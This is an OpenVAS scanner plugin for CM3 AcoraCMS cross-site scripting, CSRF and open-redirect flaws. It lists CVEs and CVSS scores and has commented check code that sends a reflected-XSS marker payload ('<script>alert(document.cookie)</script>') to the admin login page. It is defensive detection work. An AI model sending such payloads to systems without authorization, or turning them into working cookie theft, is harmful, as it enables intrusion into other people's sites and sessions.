openvasCopyright (C) 2014 Greenbone AGOPENVAS:1361412562310804268
HistoryApr 29, 2014 - 12:00 a.m.

CM3 AcoraCMS Multiple XSS, CSRF and Open Redirect Vulnerabilities

2014-04-29 00:00:00
Copyright (C) 2014 Greenbone AG
plugins.openvas.org
18

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

6.5 Medium

AI Score

Confidence

Low

0.036 Low

EPSS

Percentile

91.7%

CM3 AcoraCMS is prone to multiple cross-site scripting (XSS), cross-site request forgery (CSRF) and open URL redirection vulnerabilities.

# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

# Plugin metadata. This branch only registers identifiers, references and
# report texts with the scanner and then leaves via exit(0); no request is
# sent to a target from here. The active check is the code after the
# include() lines further down in this file.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.804268");
  script_version("2024-06-13T05:05:46+0000");
  # Seven CVEs are attached to this one plugin. The active check in this file
  # requests only the 'username' parameter of Admin/login/default.asp, so a
  # finding demonstrates that single reflected-XSS vector; the other listed
  # issues (CSRF, open redirect, further parameters) are reported by
  # association and are not individually verified by this script.
  script_cve_id("CVE-2013-4722", "CVE-2013-4723", "CVE-2013-4724", "CVE-2013-4725",
                "CVE-2013-4726", "CVE-2013-4727", "CVE-2013-4728");
  script_tag(name:"cvss_base", value:"6.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2024-06-13 05:05:46 +0000 (Thu, 13 Jun 2024)");
  script_tag(name:"creation_date", value:"2014-04-29 11:10:25 +0530 (Tue, 29 Apr 2014)");
  script_name("CM3 AcoraCMS Multiple XSS, CSRF and Open Redirect Vulnerabilities");
  # ACT_ATTACK marks this as an active check: the script sends a crafted
  # request to the target rather than inferring the issue from a version banner.
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_family("Web application abuses");
  # Plugins that must have run first (service discovery, 404 handling, web
  # crawling/directory enumeration, global settings, IIS detection).
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl",
                      "DDI_Directory_Scanner.nasl", "global_settings.nasl",
                      "gb_microsoft_iis_http_detect.nasl");
  script_require_ports("Services/www", 80);
  # The plugin is not run when this knowledge-base key is set, i.e. when the
  # operator has disabled CGI scanning in the scan configuration.
  script_exclude_keys("Settings/disable_cgi_scanning");

  # External advisories for the listed issues.
  script_xref(name:"URL", value:"http://packetstormsecurity.com/files/122954");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62007");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62008");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62009");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62010");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62011");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62012");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/67701");
  script_xref(name:"URL", value:"http://www.digitalsec.net/stuff/explt+advs/CM3.AcoraCMS.v6.txt");

  script_tag(name:"summary", value:"CM3 AcoraCMS is prone to multiple XSS, CSRF and url redirection vulnerabilities.");

  # NOTE(review): the wording below mentions reading the cookie, but the check
  # in this file only tests whether the marker script is returned unencoded in
  # the HTTP response; it never executes script or reads any cookie itself.
  script_tag(name:"vuldetect", value:"Send a crafted data via HTTP GET request and check whether it is able
  read the cookie or not.");

  script_tag(name:"insight", value:"Multiple flaws are due to:

  - Insufficient validation of user-supplied input via 'username', 'url', 'qstr'
  passed to login/default.asp

  - Insufficient validation of the 'l' parameter upon submission to track.aspx
  script.

  - insufficient measures for confirmation of sensitive transactions.");

  script_tag(name:"impact", value:"Successful exploitation will allow attackers to redirect victim from the
  intended legitimate web site to an arbitrary web site, trick the users into
  performing an unspecified action in the context of their session with the
  application and execute arbitrary script code in a user's browser session
  in context of an affected site.");

  script_tag(name:"affected", value:"CM3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b-p1, and possibly other
  versions");

  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
  options are to upgrade to a newer release, disable respective features, remove the product or
  replace the product by another one.");

  # "WillNotFix": no vendor patch is expected, so a finding has to be handled
  # with the general options from the solution text above or with
  # compensating controls such as limiting who can reach the /Admin/ login page.
  script_tag(name:"solution_type", value:"WillNotFix");
  # NOTE(review): "remote_analysis" is the quality-of-detection class recorded
  # for this result; confirm its reliability weighting against the scanner's
  # QoD documentation before using it to prioritise findings.
  script_tag(name:"qod_type", value:"remote_analysis");

  # End of description mode: nothing below runs while metadata is collected.
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");

# Active check for the reflected XSS in the 'username' parameter of the
# Acora CMS admin login page. Only this one vector is exercised; the CSRF
# and open-redirect issues named in the plugin title are not tested here.
port = http_get_port( default:80 );

# The probed pages are .asp; stop early when the host is not expected to serve ASP.
if( ! http_can_host_asp( port:port ) )
  exit( 0 );

# Two well-known install paths plus every CGI directory found by earlier plugins.
candidate_dirs = make_list_unique( "/", "/AcoraCMS", "/cms", http_cgi_dirs( port:port ) );

foreach dir( candidate_dirs ) {

  # Avoid a double slash when the application lives in the web root.
  if( dir == "/" )
    dir = "";

  # Step 1: fingerprint. Request the login page without any payload and
  # continue only if it identifies itself as the Acora CMS admin interface.
  banner_req = http_get( item:dir + "/Admin/login/default.asp", port:port );
  banner_res = http_keepalive_send_recv( port:port, data:banner_req );

  if( "Welcome to the Acora CMS web-based administration" >!< banner_res )
    continue;

  # Step 2: reflection test. The marker script is sent in 'username'; the host
  # is flagged only if it comes back unencoded together with the product
  # string, which indicates missing output encoding on that parameter.
  xss_url = dir + '/Admin/login/default.asp?username="</div><script>alert(document.cookie)</script>';

  is_reflected = http_vuln_check( port:port, url:xss_url, check_header:TRUE,
                                  pattern:"<script>alert\(document\.cookie\)</script>",
                                  extra_check:">Acora CMS" );

  if( is_reflected ) {
    # Report the exact URL that produced the reflection, then stop: one
    # confirmed instance per port is enough.
    finding = http_report_vuln_url( port:port, url:xss_url );
    security_message( port:port, data:finding );
    exit( 0 );
  }
}

# No directory showed the reflection. 99 is the exit code scripts in this feed
# use for "checked, not affected" (as opposed to 0 for "nothing to say").
exit( 99 );
